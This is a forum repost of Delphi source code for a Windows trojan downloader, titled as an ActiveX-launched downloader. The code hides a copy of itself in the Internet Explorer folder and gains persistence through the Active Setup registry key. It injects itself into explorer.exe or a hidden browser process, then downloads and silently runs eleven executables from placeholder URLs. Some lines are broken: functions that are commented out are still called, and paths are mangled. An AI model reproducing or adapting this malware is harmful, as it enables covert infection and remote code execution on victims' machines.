返回列表 發帖

Rank: 2Rank: 2

UID
18 
精華
積分
171 
金錢
272  
奉獻值
0  
閱讀權限
20 
最後登錄
2012-2-4 
1# 跳轉到 » 倒序看帖
打印
tT
piece發表於 2010-8-28 10:07 | 只看該作者

[轉貼] ActiveX啟動下載者(delphi)

  1. program InjectTheSelf;

  3. {$IMAGEBASE $13140000}

  5. uses
  6. Windows;

  8. var
  9. //動態加載shell32.dll中的ShellExecuteA函數
  10. ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
  11. //動態加載Urlmon.dll中的UrlDownloadToFileA函數
  12. Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
  13. hShell,hUrlmon: THandle;


  16. //插入IE需要用到的函數
  17. function GetIEAppPath:string;
  18. var
  19. iekey: Hkey;
  20. iename: array [0..255] of char;
  21. vType,dLength :DWORD;
  22. begin
  23. vType := REG_SZ;
  24. RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
  25. dLength := SizeOf(iename);
  26. if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  27. Result := iename
  28. else
  29. Result := '0x9c72020rogramfiles%\Internet Explorer\IEXPLORE.EXE';
  30. RegCloseKey(iekey);
  31. end;
  32. {//寫注冊表 用到的函數 為activeX啟動準備
  33. function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
  34. var
  35. regkey:hkey;
  36. begin
  37. result := false;
  38. RegCreateKey(key,PChar(subkey),regkey);
  39. if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
  40. result := true;
  41. RegCloseKey(regkey);

  43. end;
  44. }
  45. {//插入media player用到的函數
  46. function GetwmAppPath:string;
  47. var
  48. wmkey: Hkey;
  49. iename: array [0..255] of char;
  50. vType,dLength :DWORD;
  51. begin

  53. vType := REG_SZ;
  54. RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
  55. dLength := SizeOf(iename);
  56. if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  57. Result := iename
  58. else
  59. Result := '0xffae7b88rogramfiles%\Windows Media Player\wmplayer.EXE';
  60. RegCloseKey(wmkey);
  61. end;}

  63. procedure Download; //下載過程
  64. begin
  65. LoadLibrary('kernel32.dll');
  66. LoadLibrary('user32.dll');
  67. hShell:=LoadLibrary('Shell32.dll');
  68. hUrlmon:=LoadLibrary('unlmon.dll');
  69. @ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
  70. @Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
  71. Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);
  72. ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);

  74. Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);
  75. ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);

  77. Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);
  78. ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);

  80. Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);
  81. ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);

  83. Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);
  84. ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

  86. Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);
  87. ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);

  89. Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);
  90. ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

  92. Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);
  93. ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);

  95. Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);
  96. ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);

  98. Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);
  99. ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);

  101. Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);
  102. ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);


  105. ExitProcess(0);
  106. end;

  108. procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
  109. var
  110. Module, NewModule: Pointer;
  111. Size, BytesWritten, TID: longword;
  112. begin
  113. //這裡得到的值為一個返回指針型變量,指向內容包括進程映像的基址
  114. Module := Pointer(GetModuleHandle(nil));
  115. //得到內存映像的長度
  116. Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
  117. SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
  118. //在Exp進程的內存範圍內分配一個足夠長度的內存
  119. VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  120. //確定起始基址和內存映像基址的位置
  121. NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  122. //確定上面各項數據後,這裡開始進行操作
  123. WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
  124. //建立遠程線程,至此注入過程完成
  125. CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
  126. end;

  128. procedure RunInject(InjType:integer);
  129. var
  130. ProcessHandle, PID: longword;

  132. begin
  133. if InjType=0 then //注入explorer.exe
  134. begin
  135. //獲取Exp進程的PID碼
  136. GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  137. end
  138. else
  139. if InjType=3 then //注入 media player
  140. begin
  141. winexec(PChar(GetwmAppPath),sw_hide);
  142. sleep(500);
  143. GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
  144. end
  145. else //注入iexplore.exe
  146. begin
  147. //CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
  148. winexec(PChar(GetIEAppPath),sw_hide);
  149. sleep(500);
  150. GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
  151. end;
  152. //打開進程
  153. ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
  154. Inject(ProcessHandle, @Download);
  155. //關閉對像
  156. CloseHandle(ProcessHandle);
  157. end;


  160. BEGIN

  162. CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;
  163. copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);
  164. SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',
  165. FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//設置文件系統隱藏屬性
  166. //activex自啟動
  167. skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');
  168. RunInject(0); //這裡改為 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player
  169. end.
複製代碼
本主題由 Vence 於 2011-9-17 17:01 移動
收藏 分享
Arrive a goal
Taiwan technology University

返回列表